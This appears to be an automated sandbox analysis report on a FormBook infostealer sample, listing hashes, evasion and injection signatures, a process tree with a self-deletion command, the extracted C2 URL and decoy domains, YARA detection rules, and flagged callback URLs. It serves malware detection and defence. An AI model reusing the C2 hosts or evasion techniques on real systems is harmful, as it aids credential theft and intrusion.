Play interactive tour

Edit tour

Analysis Report eQLPRPErea.exe

Overview

General Information

Sample Name:	eQLPRPErea.exe
Analysis ID:	383832
MD5:	2c64897aa30694cc768f5ea375157932
SHA1:	c897f37780a5237d5c330bcf2668745201b38ff5
SHA256:	18d465a5867ee069480bb9be8eb259be41cc008e487b7b6a3cad14e3559963a9
Tags:	exeFormbook
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Contains functionality to prevent local Windows debugging

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w10x64

eQLPRPErea.exe (PID: 6876 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)

eQLPRPErea.exe (PID: 6956 cmdline: 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: 2C64897AA30694CC768F5EA375157932)

explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)

wlanext.exe (PID: 4832 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)

cmd.exe (PID: 6616 cmdline: /c del 'C:\Users\user\Desktop\eQLPRPErea.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.954738105.0000000000D00000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000001.697538747.0000000000400000.00000040.00020000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.704506840.000000001EB20000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.954361927.0000000000850000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.735925804.0000000000A00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.735695212.00000000005A0000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000003.00000002.735263364.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.eQLPRPErea.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.eQLPRPErea.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.eQLPRPErea.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.eQLPRPErea.exe.1eb20000.5.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
1.2.eQLPRPErea.exe.1eb20000.5.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
1.2.eQLPRPErea.exe.1eb20000.5.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.eQLPRPErea.exe.1eb20000.5.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.1.eQLPRPErea.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.eQLPRPErea.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.eQLPRPErea.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158c9:$sqlite3step: 68 34 1C 7B E1 0x159dc:$sqlite3step: 68 34 1C 7B E1 0x158f8:$sqlite3text: 68 38 2A 90 C5 0x15a1d:$sqlite3text: 68 38 2A 90 C5 0x1590b:$sqlite3blob: 68 53 D8 7F 8C 0x15a33:$sqlite3blob: 68 53 D8 7F 8C
3.1.eQLPRPErea.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.1.eQLPRPErea.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.1.eQLPRPErea.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
3.2.eQLPRPErea.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
3.2.eQLPRPErea.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.eQLPRPErea.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166c9:$sqlite3step: 68 34 1C 7B E1 0x167dc:$sqlite3step: 68 34 1C 7B E1 0x166f8:$sqlite3text: 68 38 2A 90 C5 0x1681d:$sqlite3text: 68 38 2A 90 C5 0x1670b:$sqlite3blob: 68 53 D8 7F 8C 0x16833:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 13 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.autobrehna.com/aqu2/?mbyD=wtLrPw5EqSQfBmzZFC+8Ts+SNzTM/uZNWoE4YkZin0I3f7v8IKK2ESUj0jO/FukH5b4y&EhUtvx=xdFt3xAHnXiTPL3p	Avira URL Cloud: Label: malware
Source: http://www.420vaca.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=8Y6pPms/JYXhy9shIA4J0qFhxM8TaW5F1yYhRg6zTM8CMz/87KRxOEEOI1BJ9RhXNxF4	Avira URL Cloud: Label: malware
Source: http://www.playfulpainters.com/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=K5Kf6zclTLbsCVqtOfN1gGfLaJuyFjl9HZAUKi2taEuEh7VLUYcol1qkdE1d13SuPReH	Avira URL Cloud: Label: malware
Source: http://www.pmrack.com/aqu2/?mbyD=eNunAjC4pU9oqobNMAvEDZJ9lTiY8rojHdPmkqZsRd0+OOiVSsWrKMnHzzNZKvEFUiJI&EhUtvx=xdFt3xAHnXiTPL3p	Avira URL Cloud: Label: malware
Source: http://www.appgusher.com/aqu2/?mbyD=G7QIB1zUm5r+y6hLlZB4xuNK9AxtrOyX5//PKXARlhVXvhDVDTjLo0W6kfT9OEzqeU0h&EhUtvx=xdFt3xAHnXiTPL3p	Avira URL Cloud: Label: malware
Source: http://www.bedpee.com/aqu2/?mbyD=73Z2oBzA8M8lSee00VrNW3/poKkDHXg5S3NVAWTjhm9PWEzsaK72sv0Q0ZTHiNL8Dzyy&EhUtvx=xdFt3xAHnXiTPL3p	Avira URL Cloud: Label: malware
Source: http://www.thesixteenthround.net/aqu2/?EhUtvx=xdFt3xAHnXiTPL3p&mbyD=s0A+R2zrZH16LfLMe9M/AmUzyN8aP2GBLvlZkca4zy1idqDqw+DRrqUwOXi4yQd3lVO7	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000009.00000002.954706104.0000000000CD0000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.stone-master.info/aqu2/"], "decoy": ["thesixteenthround.net", "nagoyadoori.xyz", "bipv.company", "imaginus-posters.com", "heliumhubs.com", "baohood.com", "thesahwfam.com", "susanlevinedesign.com", "pdxcontracttracer.com", "shopathamiltons.com", "qcmax.com", "didongthongminh.store", "igotbacon.com", "5915599.com", "seacrestonsietakey.com", "bumiflowers.com", "arcax.info", "lfhis.com", "mlqconsultores.com", "duilian2013.com", "pmrack.com", "zayo.today", "latiina.space", "fitandfierceathletics.com", "printerpartsuk.com", "xn--2021-kmd.com", "shujahumayun.com", "younitygroup.com", "serinelab.com", "infinapisoft.com", "administrativoinform.photos", "all4mortuary.com", "annaschenck.xyz", "christlicheliebe.net", "starr2021.com", "familierafting-aktiviteter.com", "thunderoffroadresort.com", "mex33.info", "serversexposed.com", "chronicbodypaintherapy.com", "billionaireblinggg.com", "permanentmarkertattoo.com", "albestfab.com", "biehnrecords.com", "yesonmeasurec.vote", "bootstrapexpress.com", "howtopreventwaterpollution.com", "fatlosszone4u.com", "hostvngiare.com", "dottproject.com", "appgusher.com", "playfulpainters.com", "gab.expert", "18598853855.com", "bizcebozca.com", "bedpee.com", "militaryhistorytv.com", "teluguc.net", "420vaca.com", "ritarkomondal.com", "autobrehna.com", "happlyending.com", "arcticblastairheat.com", "urbanladder.info"]}

Multi AV Scanner detection for submitted file

Show sources

Source: eQLPRPErea.exe	Virustotal: Detection: 28%			Perma Link
